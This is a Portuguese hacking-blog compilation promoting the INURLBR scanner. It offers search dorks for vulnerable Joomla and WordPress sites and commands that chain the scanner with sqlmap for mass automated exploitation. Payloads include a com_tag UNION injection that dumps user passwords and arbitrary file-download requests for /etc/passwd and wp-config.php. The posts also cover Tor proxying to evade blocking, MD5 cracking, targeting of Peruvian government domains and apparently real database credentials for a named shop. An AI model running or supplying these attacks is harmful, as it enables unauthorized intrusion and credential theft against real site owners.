INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all

Joomla Component com_page - SQL Injection

Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:

• FERRAMENTA -> SCANNER INURLBR
• Baixar: https://github.com/googleinurl/SCANNER-INURLBR
• FERRAMENTA -> SQLMAP
• Baixar: https://github.com/sqlmapproject/sqlmap

DORK[1]:

inurl:index.php?option=com_page&id_p=

--------------------------------------------------------------------------------------

DORK[2]: 

intext:option=com_page

--------------------------------------------------------------------------------------




Otimizando a busca

Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.

Logica de processo:

1. BUSCAR ALVOS EM MOTORES DE BUSCA.
2. RETIRAR URLS INDESEJADAS.
3. RETIRAR DUPLICATAS.
4. CONVERTER VALORES EM UM ARRAY DE DADOS.
5. ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
6. ANALISAR ERROS PADRÕES OU PERSONALIZAS.
7. SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL) 
8. ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.

Usando SCANNER INURLBR:
Comando->{

Exmplo:

./inurlbr.php 

--dork 'YOUR_DORK' 

-s OUTPUT.txt  

-q  {OP_MOTOR_SEARCH}

--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'

Usando:

./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

Observação parâmetro --command-all:

Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

Indo a fundo em --command-*

--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.

      Exemplo: --command-vul {comando}

      Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '

               --command-vul './exploit.sh _TARGET_ output.txt'

  --command-all Utilize este comand para especificar um único comando a cada URL encontrado.

      Exemplo: --command-all {comando}

      Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'

               --command-all './exploit.sh _TARGET_ output.txt'

observação:

     _TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br

    _TARGETFULL_ Será substituído pelo URL / alvo original encontrado.

Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste

Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.

sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

RESULTADO:

}

Referencias

http://1337day.com/exploit/19565

https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

https://github.com/sqlmapproject/sqlmap

Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download

EXPLOIT Wordpress A.F.D Theme Echelon

Explorando tema Echelon do wordpress falha Arbitrary File Download

# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.

A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php

Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download

Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e  /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:

------------------------------------------------------------------------------------------------

    preg_match_all("(root:.*)", $rest['corpo'], $final);

    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);

    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);

    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);

    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);

------------------------------------------------------------------------------------------------

Exploração:
Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:

Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!

Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"

Explicando comando:

--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Resultado execução:

Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon

Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.

O bug permite a download do arquivo wp-config entre outros, no wp-config contem

1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
3. define('DB_PASSWORD', 'silva2805'); Senha do banco
4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost

 0x Explorando 

            Dork revslider.php "index of"

            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr

                                                                   

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5

Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.

 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)

Introdução SCANNER INURLBR V1.0

[+]  Introdução  

*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.

*Captura de emails.

*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado. 
*Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca.
*Definição de proxy.
*Opção proxy TOR randômico.

_____
(_____)
(() ())
\   /
\ /

/=\
[___]
[INURLBR V1.0]

------------------------------------------------------------------------------

Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.

#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

DecrypterMD5 API

[ INURLBR API DecrypterMD5  ]

 bdbbe98d4714585c4a2eae76cd0e3cae

xNeither war between hackers, nor peace for the system.

----------------------------------------------------------------------------------

[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt
[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

----------------------------------------------------------------------------------

Proxy camuflagem envio de request.
- Exemplo: --proxy {proxy:porta}
- Uso:        --proxy localhost:8118
                  --proxy socks5://googleinurl@localhost:9050
                  --proxy http://admin:[email protected]:8080

O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.

Baixar:: http://pastebin.com/grYTVJKF